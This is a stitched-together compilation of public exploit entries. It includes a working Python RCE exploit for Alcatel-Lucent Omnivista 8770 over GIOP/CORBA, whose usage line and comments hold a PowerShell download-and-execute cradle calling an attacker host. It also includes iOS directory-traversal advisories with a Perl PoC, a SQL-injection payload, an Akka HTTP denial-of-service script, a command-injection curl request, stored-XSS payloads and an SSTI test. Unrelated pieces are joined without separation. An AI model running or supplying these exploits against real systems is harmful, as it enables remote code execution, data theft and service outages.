import binascii
import os
import socket
import sys
import time
# ref https://blog.malerisch.net/
# Omnivista Alcatel-Lucent running on Windows Server
# Command-line handling: argv[1] is the host to connect to; everything after it
# is joined into the command string embedded in the AddJob request further down.
if len(sys.argv) < 2:
    print "Usage: %s <target> <command>" % sys.argv[0]
    print "eg: %s 192.168.1.246 \"powershell.exe -nop -w hidden -c \$g=new-object net.webclient;IEX \$g.downloadstring('http://192.168.1.40:8080/hello');\"" % sys.argv[0]
    sys.exit(1)
target = sys.argv[1]
argument1 = ' '.join(sys.argv[2:])
# so we need to get the biosname of the target... so run this poc exploit script should be run in kali directly...
# NOTE(review): `target` is spliced unescaped into a shell pipeline, so a value
# containing shell metacharacters is executed by the shell os.popen() spawns.
# nbtscan must be on PATH; if it prints nothing, netbiosname ends up as "" and
# the server-name field built from it later is empty.
netbiosname = os.popen("nbtscan -s : "+target+" | cut -d ':' -f2").read()
netbiosname = netbiosname.strip("\n")
# dirty functions to do hex magic with bytes...
### each variable has size byte before, which includes the string + "\x00" a NULL byte
### needs to calculate for each
###
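def calcsize(giop):
    """Return the byte length of a hex-encoded GIOP body as 8 hex digits (4 bytes).

    Args:
        giop: hex string of the message body (everything after the 12-byte
            GIOP header).

    Returns:
        The decoded length, lowercase and zero-padded to 8 hex characters,
        e.g. 4 -> "00000004".

    Raises:
        binascii.Error (TypeError on Python 2): if ``giop`` is not valid hex
        (odd length or non-hex characters).
    """
    # unhexlify accepts a str on both Python 2 and 3; str.decode('hex') is 2-only.
    size = len(binascii.unhexlify(giop))
    # Same digits as hex(size)[2:].zfill(8) without the '0x' slicing.
    return format(size, '08x')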
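def calcstring(param):
    """Return the 1-byte length field for a hex-encoded CORBA string.

    The length counts the decoded bytes plus the terminating NUL byte, which
    is why 1 is added.

    Args:
        param: hex string of the value (two hex characters per byte).

    Returns:
        Two lowercase hex characters, e.g. a 7-byte value -> "08".

    Raises:
        ValueError: if the length does not fit in one byte. The previous
        version silently returned three digits, which shifts every field
        that follows in the message.
    """
    # '//' keeps this integer division on Python 3 ('/' only was under Python 2).
    length = len(param) // 2 + 1
    if length > 0xff:
        raise ValueError("string length %d does not fit in one byte" % length)
    return format(length, '02x')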
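def calcstring2(param):
    """Return the 2-byte length field for a hex-encoded CORBA string.

    Like ``calcstring`` (decoded length plus one for the NUL byte) but
    formatted as four hex digits.

    Args:
        param: hex string of the value (two hex characters per byte).

    Returns:
        Four lowercase hex characters, e.g. a 2-byte value -> "0003".

    Raises:
        ValueError: if the length does not fit in two bytes (it would
        otherwise silently widen the field and misalign the message).
    """
    # '//' keeps this integer division on Python 3 ('/' only was under Python 2).
    length = len(param) // 2 + 1
    if length > 0xffff:
        raise ValueError("string length %d does not fit in two bytes" % length)
    return format(length, '04x')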
##
#GIOP request size is specified at the 11th byte
# 0000 47 49 4f 50 01 00 00 00 00 00 00 d8 00 00 00 00 GIOP............
# d8 is the size of GIOP REQUEST
# GIOP HEADER Is 12 bytes -
# GIOP REQUEST PAYLOAD comes after and it's defined at the 11th byte
#phase 1 - add a jobset
# Phase 1: build the AddJobSet request as a hex string (decoded right before send).
giopid = 1 # an arbitrary ID can be put there... (not referenced afterwards; the id is fixed inside the hex below)
# there are checks in the size of the username.. need to find where the size is specified - anyway, 58 bytes seems all right...
usernamedata = "xxx.y.zzzzz,cn=Administrators,cn=8770 administration,o=nmc".encode('hex') # original "383737302061646d696e697374726174696f6e2c6f3d6e6d63"
#print "Size of usernamedata" + str(len(usernamedata.decode('hex')))
jobname = "MYJOB01".encode('hex') # size of 7 bytes # check also in the captured packet...
addjobset = "47494f50010000000000012600000000" + "00000001" + "01000000000000135363686564756c6572496e7465726661636500000000000a4164644a6f625365740000000000000000000008" + jobname + "00000007e0000000060000001b00000010000000240000000000000000000000000000000000000000000000000000000000000000002a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000083131313131313100010000000000000000000000000000010000000000000000000000000000003f7569643d" + usernamedata + "00000000000a6f6d6e69766973626200" # this last part can be changed???
print "Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0 - RCE via GIOP/CORBA - @malerisch"
print "Connecting to target..."
# Plain TCP to port 30024. No timeout is set, so each recv() below blocks until
# the peer answers or closes the connection.
p = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p.connect((target, 30024))
#p = remote(target, 30024, "ipv4", "tcp")
print "Adding a job..."
p.send(addjobset.decode('hex'))
#p.recv()
data = p.recv(1024)
s = len(data)
#objectkey = "" # last 16 bytes of the response!
# The server-assigned object key is the last 16 bytes of the reply and is reused
# in every later request. The reply is not validated: an empty or short reply
# yields an empty/short key and the following messages are malformed.
objectkey = data[s-16:s].encode('hex')
#print objectkey
# phase 2 - active jobset
print "Sending active packet against the job"
activegiopid = 2 # not referenced afterwards
active = "47494f50010000000000003100000000" + "00000002" + "0100000000000010" + objectkey + "0000000741637469766500000000000000"
#print active
p.send(active.decode('hex'))
data2 = p.recv(1024) # reply is read but not inspected
#print data2
# phase3 add task
addjobid = 3 # not referenced afterwards
print "Adding a task...."
taskname = "BBBBBBB".encode('hex')
servername = netbiosname.encode('hex') # NetBIOS name from the nbtscan lookup above; "" if that produced nothing
command = "C:\Windows\System32\cmd.exe".encode('hex') #on 32bit
#command = "C:\Windows\SysWOW64\cmd.exe".encode('hex') #on 64bit
# Length byte for `command` (+1 for the NUL). hex() output is not zero-padded, so
# this is exactly two hex digits only while the length is between 0x10 and 0xff.
commandsize = hex((len(command.decode('hex'))+1))
commandsize = str(commandsize).replace("0x","")
#print "Command size: "+ str(commandsize)
#print command.decode('hex')
#time.sleep(10)
#powershell = str(command)
#powershell = "powershell.exe -nop -c $J=new-object net.webclient;IEX $J.downloadstring('http://192.168.1.40:8080/hello');"
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
#-nop -w hidden -c $J=new-object net.webclient;$J.proxy=[Net.WebRequest]::GetSystemWebProxy();$J.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $J.downloadstring('http://10.190.127.154:8080/');
# The user-supplied command (argv[2:]) becomes the argument string of the task.
argument = str("/c "+argument1).encode('hex')
#argument = str("/c notepad.exe").encode('hex')
#print len(argument.decode('hex'))
#argumentsize = len(str("/c "+powershell))+1
#print "Argument size: "+str(argumentsize)
argumentsize = calcstring2(argument) # 2-byte length field (decoded length + NUL)
#print "argument size: "+str(argumentsize)
#print argument.decode('hex')
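def calcpadd(giop):
    """Pad a hex-encoded request body so its byte length is a multiple of 4.

    A 7-byte default padding is placed between ``giop`` and the module-level
    ``fixedpadding`` trailer. When the total byte count is not 4-aligned, the
    first ``dif`` bytes of the default padding are dropped so that it is.

    Args:
        giop: hex string of the request body assembled so far.

    Returns:
        ``giop`` + (possibly shortened) default padding + ``fixedpadding``,
        still hex-encoded.

    Raises:
        ValueError: if the combined hex string has odd length, i.e. it does not
            describe whole bytes; the alignment arithmetic would be wrong then.
    """
    defaultpadding = "00000000000001"
    check = giop + defaultpadding + fixedpadding
    if len(check) % 2:
        raise ValueError("hex string has odd length: %d" % len(check))
    # '//' keeps the byte count an int on Python 3 ('/' was integer division on Python 2).
    dif = (len(check) // 2) % 4
    if dif == 0:
        return check
    # Drop `dif` leading bytes (two hex chars each) of the default padding to realign.
    return giop + defaultpadding[dif * 2:] + fixedpadding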
addjobhdr = "47494f5001000000" # 8 bytes + 4 bytes for message size, including size of the giop request message
# Trailer read from module scope by calcpadd(); it is assigned here, after the
# def but before the call at `addjobfin` below, so the lookup succeeds at call time.
fixedpadding = "000000000000000100000000000000010000000000000002000000000000000000000000000000000000000f0000000000000000000000000000000000000002000000000000000000000000"
variablepadding = "000000000001" # not referenced anywhere below
#print calcstring(servername)
#print calcstring(taskname)
#print "Command:" +str(command)
#print "command size:"+str(commandsize)
# AddJob body: object key from phase 1, then the length-prefixed task name,
# command path, server (NetBIOS) name and the "/c <argument>" string. With an
# empty `servername` the length byte is "01" and the name field is empty.
addjob = "00000000000000b30100000000000010" + objectkey + "000000074164644a6f62000000000000000000" + calcstring(taskname) + taskname + "0000000001000000"+ commandsize + command +"00000000" + calcstring(servername) + servername + "000000" + argumentsize + argument + "00"
#print addjob
addjobfin = calcpadd(addjob) # 4-byte alignment plus the fixed trailer
#print addjobfin.decode('hex')
addjobsize = calcsize(addjobfin) # 4-byte length field that goes into the header
#print "Lenght of the addjob: "+str(len(addjobfin.decode('hex')))
# we need to add the header
finalmsg = addjobhdr + addjobsize + addjobfin
p.send(finalmsg.decode('hex'))
data3 = p.recv(1024) # reply is read but not inspected
#print data3
# phase4 - execute task
executeid = 4 # not referenced afterwards
print "Executing task..."
execute = "47494f50010000000000003500000000000001100100000000000010" + objectkey + "0000000b457865637574654e6f7700000000000000"
p.send(execute.decode('hex'))
data4 = p.recv(1024) # reply is read but not inspected
print "All packets sent..."
# No reply is checked anywhere above, so this only means the sends did not raise.
print "Exploit sequence completed, command should have been executed...:-)"
p.close()
# optional requests to remove the job after the exploitation
### in metasploit, we should migrate to another process and then call an "abort" function of Omnivista
##phase5 - abort the job
# Built but never sent: the job set and task created above remain on the server.
canceljob = "47494f500100000000000030000000000000008e0100000000000010" + objectkey + "0000000743616e63656c000000000000"
###phase6 - delete the jobset
# Built but never sent (see canceljob).
deletejob = "47494f500100000000000038000000000000009e0100000000000010" + objectkey + "0000000d44656c6574654a6f625365740000000000000000"
Document Title:
===============
Album Streamer v2.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1481
Release Date:
=============
2015-05-07
Vulnerability Laboratory ID (VL-ID):
====================================
1481
Common Vulnerability Scoring System:
====================================
6.6
Product & Service Introduction:
===============================
1 Tap - Quick, Album Streamer, best Photo/Video Transfer app ever! Quick way to share your Album Photos and
Videos to your computer. It takes only single tap to stream and download all/selected photos or videos.
You can even view or play slide show of all your photos directly on the computer without downloading.
(Copy of the Homepage: https://itunes.apple.com/DE/app/id835284235 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a directory traversal web vulnerability in the official Album Streamer v2.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Spider Talk
Product: Album Streamer - iOS Mobile Web Application (Wifi) 2.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A path traversal web vulnerability has been discovered in the official Album Streamer v2.0 iOS mobile web-application.
The security vulnerability allows a remote attacker to make unauthorized requests for system paths and thereby compromise the
mobile application or Apple iOS device.
The vulnerability is located in the `id` parameter, which supplies the `path` value of the photoDownload module. The vulnerability can be exploited by
local or remote attackers without user interaction. The attacker replaces the picture asset id in the photoDownload request
with a malicious payload such as ./etc/passwd or ./etc/hosts. The attack vector is located on the application side of the service and
the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] photoDownload
Vulnerable Parameter(s):
[+] id
Affected Module(s):
[+] photoDownload Item Index
Proof of Concept (PoC):
=======================
The vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: http://localhost/photoDownload?id=[DIRECTORY TRAVERSAL]../../../../../../../etc
Vulnerable Source(s): localhost/photoDownload
<div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id0" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id0" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id0">asset.JPG</a></div></div><div class="thumbnailBorder"><div class="thumbnailPicture"><img class="showPreviewModalPopup" src="/photoTbDownload?id=id1" border="0" height="100px" width="100px"></div><div id="thumbnailTitle"><input id="id1" name="photoCheckbox" type="checkbox"> <a href="/photoDownload?id=id1">asset.PNG</a></div></div>
<!-- PREVIEW SECTION -->
<div style="display: none;" id="overlay"></div>
<div style="display: none;" id="popupBox">
<div style="display: none;" id="popupContent">
<img class="previewLoadingImage" id="previewLoading" src="/loading.gif">
<img class="previewImage" src="/photoDownload?id=id1">
<img src="/imgAlbumStreamPrev.png" class="btnShowPrev" height="25px" width="25px">
<img src="/imgAlbumStreamNext.png" class="btnShowNext" height="25px" width="25px">
</div>
</div>
<!-- BREAK -->
<div class="sectionBreak"> </div>
<!-- VIDEOS SECTION -->
<div>
<h1>
<input class="videoAllCheckBox" id="videoAllCheckBox" type="checkbox"> Videos
<input class="btnVideoDownload" value="Download (Selected)" type="button">
</h1>
</div>
--- Poc Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/photoDownload?id=../../../../etc Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[25568] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[25568]
Content-Disposition[: attachment; filename=asset.JPG]
Date[Thu, 30 Apr 2015 13:29:14 GMT]
Reference(s):
http://localhost/
http://localhost/photoDownload
Solution - Fix & Patch:
=======================
The vulnerability can be patched by securely parsing the id value in the photoDownload module.
Restrict the input and disallow special characters to prevent further path traversal attacks.
Implement a whitelist so that only authorized URLs can be requested through the mobile app API.
Security Risk:
==============
The security risk of the directory traversal vulnerability in the wifi interface is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Album Lock v4.0 iOS - Directory Traversal Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2033
Release Date:
=============
2017-02-20
Vulnerability Laboratory ID (VL-ID):
====================================
2033
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
Do you have any secret photo and videos in your iPhone? Album Lock can protect your privacy perfectly. Album is the most
convenient private Photo&Video App! You can add your SPECIAL photos&videos into AlbumLock, we provides many convenient ways.
From Photo App(Camera Roll), iTunes File Sharing Sync, WiFi Transfer and in App Camera.
(Copy of the Homepage: https://itunes.apple.com/us/app/album-lock-lock-secret-photo/id851608952 )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the official Album Lock v4.0 ios mobile application.
Vulnerability Disclosure Timeline:
==================================
2017-02-20: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official Album Lock v4.0 iOS mobile web-application.
The issue allows an attacker to make unauthorized requests for, and download, local application files by manipulating path parameters.
The directory traversal web vulnerability is located in the `filePaht` parameter of the wifi web-server interface. Remote attackers
are able to request the local web-server during the sharing process and access application files without authentication. Attackers are able
to request image path variables via `getObject` to access or download files. Remote attackers are able to access the root `document`
path of the application. The request method to execute is GET and the attack vector is located on the client-side of the web-server
web-application. Finally, an attacker is able to access the service with the credentials by using a client over the HTTP protocol.
The security risk of the directory traversal vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.2.
Exploitation of the web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the
vulnerability results in information leakage and mobile application compromise through unauthorized and unauthenticated access.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] getObject
Vulnerable Parameter(s):
[+] filePaht
Affected Module(s):
[+] Web-Server File System
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without user interaction or privilege web-application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Standard Request:
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/._alias_images/fhhjjj/picture-00001.png
PoC: Payload
/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Malicious Request: Exploitation
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/Documents/
http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/
http://localhost:8880/getImage?filePaht=/var/mobile/
PoC: Exploit
use strict;
use LWP::UserAgent;
# One GET against the hard-coded $host; the raw response body is printed.
# NOTE(review): $host uses port 5555 here, while the session logs above show
# the interface on localhost:8880 - the two parts of the advisory disagree.
my $b = LWP::UserAgent->new();
my $host = "1.1.1.1:5555";
print $b->get("http://".$host."/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/config.dat")->content;
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost:8880/getImage?filePaht=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C./../../../Application
Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8880]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Referer[http://localhost:8880/list_gif.html?folder=/var/mobile/Containers/Data/Application/FD29A0B7-9931-4A7F-A9AA-3942B539DC8C/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Reference(s):
http://localhost:8880/
http://localhost:8880/getImage
http://localhost:8880/getImage?filePaht=
http://localhost:8880/list_gif.html
http://localhost:8880/list_gif.html?folder=
Solution - Fix & Patch:
=======================
The vulnerability can be patched by preventing the filePaht parameter from requesting local paths above or outside the document folder.
Include a whitelist of allowed request paths and set up a secure exception handler to prevent exploitation.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile application is estimated as high. (CVSS 7.2)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to ask for permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
source: https://www.securityfocus.com/bid/55746/info
AlamFifa CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AlamFifa CMS 1.0 Beta is vulnerable; other versions may also be affected.
user_name_cookie=test' LIMIT 0,1 UNION ALL SELECT 93,93,CONCAT(0x3a6b63733a,0x50766e44664451645753,0x3a6165683a),93,93,93#;
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697
import argparse
import logging
import requests
# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()
def send_benign_request(url, verify=True):
    """Check that ``url`` answers a plain GET before anything else is sent.

    ``verify`` is accepted for symmetry with the caller but is not forwarded
    to ``requests.get``, so certificate verification stays at the requests
    default.

    Returns:
        True when the GET completed (whatever the status code), False when
        it raised.
    """
    log.info(f"Sending benign request to {url} for checking reachability...")
    try:
        response = requests.get(url)
        log.info(f"Benign request returned following status code: {response.status_code}")
    except Exception as exc:
        log.info(f"The following exception was encountered: {exc}")
        return False
    return True
def send_malicious_request(url, verify=True):
    """Send one GET whose User-Agent is 8191 '(' characters and log the outcome.

    ``verify`` is accepted but not passed to ``requests.get`` (certificate
    verification stays at the requests default). A RequestException whose text
    says the remote end closed the connection without a response is logged as a
    likely successful DoS; other RequestExceptions are ignored without a log
    line, and any other exception is logged.
    """
    log.info(f"Sending malicious request to {url}")
    # Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
    nested_comment_payload = "("*8191
    headers = {'User-Agent': nested_comment_payload}
    try:
        r = requests.get(url, headers=headers)
        log.info(f"Request returned following status code: {r.status_code}")
    # Expected exception to be returned if server is DoSed successfully
    except requests.exceptions.RequestException as e:
        if "Remote end closed connection without response" in str(e):
            log.info(f"The server is unresponsive per {e}: DoS likely successful")
    except Exception as e:
        log.info(f"The following exception was encountered: {e}")
if __name__ == "__main__":
    # Parse command line
    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
    required_arguments = parser.add_argument_group('required arguments')
    # NOTE: required="True" is the string "True" (truthy), so argparse still
    # treats the option as required; the conventional value is the boolean True.
    required_arguments.add_argument("-t", "--target",
        help="Target URL for vulnerable Akka server (e.g. https://localhost)",
        required="True", action="store")
    # store_false: args.insecure is True unless -k is given. It is passed as the
    # `verify` argument below, which neither request function forwards to
    # requests.get, so -k currently has no effect on certificate verification.
    parser.add_argument("-k", "--insecure",
        help="Disable verification of SSL/TLS certificate",
        action="store_false", default=True)
    args = parser.parse_args()
    # Send requests: first is connectivity check, second is DoS attempt
    if send_benign_request(args.target, args.insecure):
        send_malicious_request(args.target, args.insecure)
# Exploit Title: AKIPS Network Monitor 15.37-16.6 OS Command Injection
# Date: 03-14-2016
# Exploit Author: BrianWGray
# Contact: https://twitter.com/BrianWGray
# WebPage: http://somethingbroken.com/
# Vendor Homepage: https://www.akips.com/
# Software Link: https://www.akips.com/showdoc/download
# Version: 15.37 through 16.5, May impact earlier versions, remediated in 16.6
# Tested on: FreeBSD 10.2-RELEASE-p7
# CVE : N/A
1. Description
The "username" login parameter allows for OS Command injection via command Injection during a failed login attempt returns the command injection output to a limited login failure field.
By using concatenation '||' a command may be appended to the username.
The vendor has stated the following:
"Apparently the issue is in a Perl module which does an open2() of a
custom PAM program. The command is not being properly sanitised." - Vendor Reply
http://somethingbroken.com/vuln/0002.html
2. Proof of Concept
example request:
curl 'https://Application/' --data 'username=%7C%7C+whoami&password=' --compressed --insecure -# | grep -wF "Error signing in:"
example response:
<div class="alert alert-warning"><strong>Error signing in:</strong> akips</div>
3. Solution:
Update to version 16.6
https://www.akips.com/showdoc/download
4. Timeline:
* 03-14-2016: Discovered, Vendor Notified, Vendor Response
* 03-15-2016: Vendor Releases Remediated Build 16.6
# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 07-01-2021
# Exploit Author: Tyler Butler
# Vendor Homepage: https://www.akcp.com/
# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
# Version: < SP480-20210624
# CVE: CVE-2021-35956
# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
1) Stored Cross-Site Scripting via System Settings
POST /system?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 114
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/system?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_SA01=System+Namer&_SA02=RDC&_SA03=Name<svg/onload=alert`xss`>&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
2) Stored Cross-Site Scripting via Email Settings
POST /mail?time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 162
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/mail?time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=<svg/onload=alert`xxss`>&_PS05_4=&sbt2=Save
3) Stored Cross-Site Scripting via Sensor Description
POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
Host: [target]
Content-Length: 55
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://[target]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://[target]/senswatr?index=0&time=32e004c941f912
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: CPCookie=sensors=400
Connection: close
_WT00-IX="><svg/onload=alert`xss`>&_WT03-IX=2&sbt1=Save
# Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI)
# Exploit Author: tmrswrr
# Date: 30/05/2024
# Vendor: https://akaunting.com/forum
# Software Link: https://akaunting.com/apps/crm
# Vulnerable Version(s): 3.1.8
# Tested : https://www.softaculous.com/apps/erp/Akaunting
1 ) Login with admin cred and go to : Items > New Item
https://127.0.0.1/Akaunting/1/common/items
2 ) Write the SSTI payload {{7*7}} in the Name field, and random numbers in the Sale and Purchase Price fields
3 ) Save it
4 ) You will see the result:
49
====================================================================================
